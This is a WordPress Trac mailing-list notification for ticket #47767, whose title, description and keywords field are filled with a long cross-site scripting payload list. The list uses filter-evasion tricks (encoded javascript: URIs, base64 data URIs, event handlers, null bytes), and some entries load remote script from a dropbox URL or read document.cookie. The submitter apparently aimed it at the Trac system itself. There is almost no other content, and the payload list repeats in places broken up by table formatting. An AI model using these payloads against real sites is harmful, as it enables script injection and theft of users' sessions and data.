[wp-trac] [WordPress Trac] #47767: <iframe %00 src="&Tab; javascript:prompt(1)&Tab; "%00> <svg><style>{font-family&colon; '<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT&colon; confirm&lpar; 1&rpar; " <sVg><scRipt %00>alert&lpar; 1&rpar; {Opera} <img/src=`%00` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript&colon; confirm(1)" <img src=`%00`&NewLine; onerror=alert(1)&NewLine; <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab; ></script> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src="data:text/html; &Tab; base64&Tab; ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ &#34; &#62; <h1/onmouseover='\u0061lert(1)'>%00 <iframe/src="data:text/html,<svg &#111; &#110; load=alert(1)>"> <meta content="&NewLine; 1 &NewLine; ; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data&colon; ,window.open('https://www.google.com/')></script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0; url=javascript:confirm(1)"> <iframe src=javascript&colon; alert&lpar; document&period; location&rpar; > <form><a href="javascript:\u0061lert&#x28; 1&#x29; ">X </script><img/*%00/src="worksinchrome&colon; prompt&#x28; 1&#x29; "/%00*/onerror='eval(src)'> <img/&#09; &#10; &#11; src=`~` onerror=prompt(1)> <form><iframe &#09; &#10; &#11; src="javascript&#58; alert(1)"&#11; &#10; &#09; ; > <a href="data:application/x-x509-user-cert; &NewLine; base64&NewLine; ,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09; &#10; &#11; >X</a http://www.google<script .com>alert(document.location)</script <a&#32; href&#61; &#91; &#00; &#93; "&#00; onmouseover=prompt&#40; 1&#41; &#47; &#47; ">XYZ</a <img/src=@&#32; &#13; onerror = prompt('&#49; ') <style/onload=prompt&#40; '&#88; &#83; &#83; '&#41; <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style &#32; ><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( &#00; </form><input type&#61; "date" onfocus="alert(1)"> <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28; 1&#x29; '> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <iframe srcdoc='&lt; body onload=prompt&lpar; 1&rpar; &gt; '> <a href="javascript:void(0)" onmouseover=&NewLine; javascript:alert(1)&NewLine; >X</a> <script ~~~>alert(0%0)</script ~~~> <style/onload=&lt; !--&#09; &gt; &#10; alert&#10; &lpar; 1&rpar; > <///style///><span %2F onmousemove='alert&lpar; 1&rpar; '>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab; prompt(1) &#34; &#62; <svg><style>{-o-link-source&colon; '<body/onload=confirm(1)>' &#13; <blink/&#13; onmouseover=pr&#x6F; mp&#116; (1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert&#x28; 1&#x29; '>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe/%00/ src=javaSCRIPT&colon; alert(1) //<form/action=javascript&#x3A; alert&lpar; document&period; cookie&rpar; ><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src&#x3A; '<style/onload=this.onload=confirm(1)>'</font>/</style> <a/href="javascript:&#13; javascript:prompt(1)"><input type="X"> </plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28; 1&#x29; {Opera} <a href="javascript&colon; \u0061&#x6C; &#101%72t&lpar; 1&rpar; "><button> <div onmouseover='alert&lpar; 1&rpar; '>DIV</div> <iframe style="xg-p:absolute; top:0; left:0; width:100%; height:100%" onmouseover="prompt(1)"> <a href="jAvAsCrIpT&colon; alert&lpar; 1&rpar; ">X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(1)">On Mouse Over</var> <a href=javascript&colon; alert&lpar; document&period; cookie&rpar; >Click Here</a> <img src="/" =_=" title="onerror='prompt(1)'"> <%<!--'%><script>alert(1); </script --> <script src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<><iframe/src=javascript:confirm(1) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div> http://www.<script>alert(1)</script .com <iframe src=j&NewLine; &Tab; a&NewLine; &Tab; &Tab; v&NewLine; &Tab; &Tab; &Tab; a&NewLine; &Tab; &Tab; &Tab; &Tab; s&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; c&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; r&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; i&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; p&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; t&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &colon; a&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; l&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; e&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; r&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; t&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; 28&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; 1&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; %29></iframe> <svg><script ?>alert(1) <iframe src=j&Tab; a&Tab; v&Tab; a&Tab; s&Tab; c&Tab; r&Tab; i&Tab; p&Tab; t&Tab; :a&Tab; l&Tab; e&Tab; r&Tab; t&Tab; %28&Tab; 1&Tab; %29></iframe> <img src=`xx:xx`onerror=alert(1)> <meta http-equiv="refresh" content="0; javascript&colon; alert(1)"/> <math><a xlink:href="//jsfiddle.net/t846h/">click <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg contentScriptType=text/vbs><script>MsgBox+1 <a href="data:text/html; base64_,<svg/onload=\u0061&#x6C; &#101%72t(1)>">X</a <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data&colon; text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data&colon; text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script <object data=javascript&colon; \u0061&#x6C; &#101%72t(1)> <script>+-+-1-+-+alert(1)</script> <body/onload=&lt; !--&gt; &#10alert(1)> <script itworksinallbrowsers>/*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) <svg><script>//&NewLine; confirm(1); </script </svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A; &#97lert(1)>ClickMe <script x> alert(1) </script 1=2 <div/onmouseover='alert(1)'> style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061; &#x06c; &#x0065; &#x00000072; &#x00074; (1)></script> <div style="xg-p:absolute; top:0; left:0; width:100%; height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> "><img src=x onerror=window.open('https://www.google.com/'); > <form><button formaction=javascript&colon; alert(1)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html; base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a href="data:text/html; blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

WordPress Trac noreply at wordpress.org
Tue Jul 23 22:15:32 UTC 2019


#47767: <iframe %00 src="	javascript:prompt(1)	"%00>  <svg><style>{font-
family:'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT:confirm(1)"  <sVg><scRipt
%00>alert(1) {Opera}  <img/src=`%00`
onerror=this.onerror=confirm(1)  <form><isindex
formaction="javascript:confirm(1)"  <img src=`%00`

onerror=alert(1)
  <script/	
src='https://dl.dropbox.com/u/13018058/js.js' /	></script>  <ScRipT
5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
"><h1/onmouseover='\u0061lert(1)'>%00
<iframe/src="data:text/html,<svg onload=alert(1)>">  <meta
content="
 1 
; JAVASCRIPT: alert(1)" http-
equiv="refresh"/>  <svg><script
xlink:href=data:,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <iframe
src=javascript:alert(document.location)>  <form><a
href="javascript:\u0061lert&#x28;1&#x29;">X
</script><img/*%00/src="worksinchrome:prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>
<img/	
 src=`~` onerror=prompt(1)> <form><iframe
	
 src="javascript:alert(1)"
	;>  <a
href="data:application/x-x509-user-
cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	
>X</a
http://www.google<script .com>alert(document.location)</script
<a href=[�]"�
onmouseover=prompt(1)//">XYZ</a  <img/src=@ 
onerror = prompt('1')  <style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^  </style
 ><script   :-(>/**/alert(document.location)/**/</script   :-(
�</form><input type="date" onfocus="alert(1)">  <form><textarea

 onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>  <script
/***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script
/***/  <iframe srcdoc='<body onload=prompt(1)>'>  <a
href="javascript:void(0)"
onmouseover=
javascript:alert(1)
>X</a>  <script
~~~>alert(0%0)</script ~~~>
<style/onload=<!--	>
alert
(1)>
<///style///><span %2F onmousemove='alert(1)'>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'

<blink/
 onmouseover=pr&#x6F;mpt(1)>OnMouseOver {Firefox &
Opera}  <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7}  <iframe/%00/
src=javaSCRIPT:alert(1)
//<form/action=javascript&#x3A;alert(document.cookie)><input/type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\
</script //|\\
</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
<a/href="javascript:
 javascript:prompt(1)"><input type="X">
</plaintext\></|\><plaintext/onmouseover=prompt(1)  </svg>''<svg><script
'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}  <a
href="javascript:\u0061&#x6C;&#101%72t(1)"><button>  <div
onmouseover='alert(1)'>DIV</div>  <iframe
style="xg-p:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)">  <a
href="jAvAsCrIpT:alert(1)">X</a>  <embed
src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<object
data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<var onmouseover="prompt(1)">On Mouse Over</var>  <a
href=javascript:alert(document.cookie)>Click
Here</a>  <img src="/" =_=" title="onerror='prompt(1)'">
<%<!--'%><script>alert(1);</script -->  <script
src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload =
prompt(1)  <iframe/onreadystatechange=alert(1)  <svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)  <input type="text"
value=`` <div/onmouseover='alert(1)'>X</div>
http://www.<script>alert(1)</script .com  <iframe
src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
<svg><script ?>alert(1)  <iframe
src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
<img src=`xx:xx`onerror=alert(1)>  <meta http-equiv="refresh"
content="0;javascript:alert(1)"/> <math><a
xlink:href="//jsfiddle.net/t846h/">click  <embed
code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1  <a
href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061')
worksinIE>  <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~
\u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script
U+
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script
a=\u0061 & /=%2F
<script/src=data:text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
<object data=javascript:\u0061&#x6C;&#101%72t(1)>
<script>+-+-1-+-+alert(1)</script>  <body/onload=<!-->&#10alert(1)>
<script itworksinallbrowsers>/*<script* */alert(1)</script  <img src
?itworksonchrome?\/onerror = alert(1)
<svg><script>//
confirm(1);</script </svg> <svg><script
onlypossibleinopera:-)> alert(1)  <a aa aaa aaaa aaaaa aaaaaa aaaaaaa
aaaaaaaa aaaaaaaaa aaaaaaaaaa
href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe  <script x> alert(1)
</script 1=2  <div/onmouseover='alert(1)'> style="x:">  <--`<img/src=`
onerror=alert(1)> --!>
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
<div style="xg-p:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)" onclick="alert(1)">x</button>  "><img src=x
onerror=window.open('https://www.google.com/');>  <form><button
formaction=javascript:alert(1)>CLICKME  <math><a
xlink:href="//jsfiddle.net/t846h/">click  <object
data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>  <iframe
src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<a
href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click
Me</a>
-------------------------------------------------+-------------------------
 Reporter:  bugbounty00                          |       Owner:  (none)
     Type:  defect (bug)                         |      Status:  new
 Priority:  normal                               |   Milestone:  Awaiting
                                                 |  Review
Component:  General                              |     Version:
 Severity:  normal                               |  Resolution:
 Keywords:  <iframe %00                          |     Focuses:
  src="	javascript:prompt(1)	"%00>       |
  <svg><style>{font-                             |
  family:'<iframe/onload=confirm(1)>'      |
  <input/onmouseover="javaSCRIPT:confirm(1)"|
  <sVg><scRipt %00>alert(1) {Opera}    |
  <img/src=`%00`                                 |
  onerror=this.onerror=confirm(1)                |
  <form><isindex                                 |
  formaction="javascript:confirm(1)" <img  |
  src=`%00`
 onerror=alert(1)
   |
  <script/	                                  |
  src='https://dl.dropbox.com/u/13018058/js.js'  |
  /	></script> <ScRipT                       |
  5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?  |
  <iframe/src="data:text/html;	base64	   |
  PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script     |
  /*%00*/>/*%00*/alert(1)/*%00*/</script         |
  /*%00*/                                        |
  "><h1/onmouseover='\u0061lert(1)'>%00  |
  <iframe/src="data:text/html <svg               |
  onload=alert(1)>"> <meta             |
  content="
 1 
;                |
  JAVASCRIPT: alert(1)" http-              |
  equiv="refresh"/> <svg><script                 |
  xlink:href=data:                         |
  window.open('https://www.google.com/')></script|
  <svg><script                                   |
  x:href='https://dl.dropbox.com/u/13018058/js.js'|
  {Opera} <meta http-equiv="refresh"             |
  content="0;url=javascript:confirm(1)">         |
  <iframe                                        |
  src=javascript:alert(document.location)>|
  <form><a                                       |
  href="javascript:\u0061lert&#x28;1&#x29;">X    |
  </script><img/*%00/src="worksinchrome:prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>|
  <img/	
 src=`~`                   |
  onerror=prompt(1)> <form><iframe               |
  	
                                |
  src="javascript:alert(1)"
	;> |
  <a href="data:application/x-x509-user-         |
  cert;
base64
                  |
  PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	
>X</a|
  http://www.google<script                       |
  .com>alert(document.location)</script          |
  <a href=[�]"�          |
  onmouseover=prompt(1)//">XYZ</a|
  <img/src=@ 
 onerror =                 |
  prompt('1')                                |
  <style/onload=prompt('XSS')|
  <script                                        |
  ^__^>alert(String.fromCharCode(49))</script    |
  ^__^ </style  ><script                 |
  :-(>/**/alert(document.location)/**/</script   |
    :-( �</form><input type="date"   |
  onfocus="alert(1)"> <form><textarea 
      |
  onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>|
  <script                                        |
  /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script|
  /***/ <iframe srcdoc='<body                 |
  onload=prompt(1)>'> <a            |
  href="javascript:void(0)"                      |
  onmouseover=
javascript:alert(1)
>X</a>|
  <script ~~~>alert(0%0)</script ~~~>            |
  <style/onload=<!--	>
alert
(1)>|
  <///style///><span %2F                         |
  onmousemove='alert(1)'>SPAN          |
  <img/src='http://i.imgur.com/P8mL8.jpg'        |
  onmouseover=	prompt(1)                     |
  "><svg><style>{-o-link-                |
  source:'<body/onload=confirm(1)>'        |
  
<blink/
                              |
  onmouseover=pr&#x6F;mpt(1)>OnMouseOver    |
  {Firefox & Opera} <marquee                     |
  onstart='javascript:alert&#x28;1&#x29;'>^__^   |
  <div/style="width:expression(confirm(1))">X</div>|
  {IE7} <iframe/%00/                             |
  src=javaSCRIPT:alert(1)                  |
  //<form/action=javascript&#x3A;alert(document.cookie)><input/type='submit'>//|
  /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1)|
  /*iframe/src*/> //|\\ <script //|\\            |
  src='https://dl.dropbox.com/u/13018058/js.js'> |
  //|\\ </script //|\\                           |
  </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>|
  <a/href="javascript:
                      |
  javascript:prompt(1)"><input type="X">         |
  </plaintext\></|\><plaintext/onmouseover=prompt(1)|
  </svg>''<svg><script                           |
  'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29;|
  {Opera} <a                                     |
  href="javascript:\u0061&#x6C;&#101%72t(1)"><button>|
  <div                                           |
  onmouseover='alert(1)'>DIV</div>     |
  <iframe                                        |
  style="xg-p:absolute;top:0;left:0;width:100%;height:100%"|
  onmouseover="prompt(1)"> <a                    |
  href="jAvAsCrIpT:alert(1)">X</a>|
  <embed                                         |
  src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">|
  <object                                        |
  data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">|
  <var onmouseover="prompt(1)">On Mouse          |
  Over</var> <a                                  |
  href=javascript:alert(document.cookie)>Click|
  Here</a> <img src="/" =_="                     |
  title="onerror='prompt(1)'">                   |
  <%<!--'%><script>alert(1);</script -->         |
  <script src="data:text/javascript              |
  alert(1)"></script> <iframe/src \/\/onload =   |
  prompt(1) <iframe/onreadystatechange=alert(1)  |
  <svg/onload=alert(1) <input                    |
  value=<><iframe/src=javascript:confirm(1)      |
  <input type="text" value=``                    |
  <div/onmouseover='alert(1)'>X</div>            |
  http://www.<script>alert(1)</script .com       |
  <iframe                                        |
  src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>|
  <svg><script ?>alert(1) <iframe                |
  src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>|
  <img src=`xx:xx`onerror=alert(1)> <meta http-  |
  equiv="refresh"                                |
  content="0;javascript:alert(1)"/>        |
  <math><a                                       |
  xlink:href="//jsfiddle.net/t846h/">click       |
  <embed                                         |
  code="http://businessinfo.co.uk/labs/xss/xss.swf"|
  allowscriptaccess=always> <svg                 |
  contentScriptType=text/vbs><script>MsgBox+1    |
  <a href="data:text/html;base64_                |
  <svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a    |
  <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061')|
  worksinIE> <script>~'\u0061' ;                 |
  \u0074\u0068\u0072\u006F\u0077 ~               |
  \u0074\u0068\u0069\u0073.                      |
  \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script|
  U+                                             |
  <script/src="data:text%2Fj\u0061v\u0061script|
  \u0061lert('\u0061')"></script a=\u0061 &      |
  /=%2F                                          |
  <script/src=data:text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116|
  \u0061%6C%65%72%74(/XSS/)></script <object     |
  data=javascript:\u0061&#x6C;&#101%72t(1)>|
  <script>+-+-1-+-+alert(1)</script>             |
  <body/onload=<!-->&#10alert(1)> <script  |
  itworksinallbrowsers>/*<script*                |
  */alert(1)</script <img src                    |
  ?itworksonchrome?\/onerror = alert(1)          |
  <svg><script>//
confirm(1);</script    |
  </svg> <svg><script onlypossibleinopera:-)>    |
  alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa   |
  aaaaaaaa aaaaaaaaa aaaaaaaaaa                  |
  href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe |
  <script x> alert(1) </script 1=2               |
  <div/onmouseover='alert(1)'> style="x:">       |
  <--`<img/src=` onerror=alert(1)> --!>          |
  <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074|
  &#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>|
  <div                                           |
  style="xg-p:absolute;top:0;left:0;width:100%;height:100%"|
  onmouseover="prompt(1)"                        |
  onclick="alert(1)">x</button> "><img src=x     |
  onerror=window.open('https://www.google.com/');>|
  <form><button                                  |
  formaction=javascript:alert(1)>CLICKME   |
  <math><a                                       |
  xlink:href="//jsfiddle.net/t846h/">click       |
  <object data=data:text/html;base64             |
  PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>         |
  <iframe src="data:text/html                    |
  %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>|
  <a href="data:text/html;blabla                 |
  &#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click|
  Me</a>                                         |
-------------------------------------------------+-------------------------
Changes (by bugbounty00):

 * Attachment "test (2).jpg" removed.

 "><img src=Xss onerror=alert(1)>

-- 
Ticket URL: <https://core.trac.wordpress.org/ticket/47767>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform


More information about the wp-trac mailing list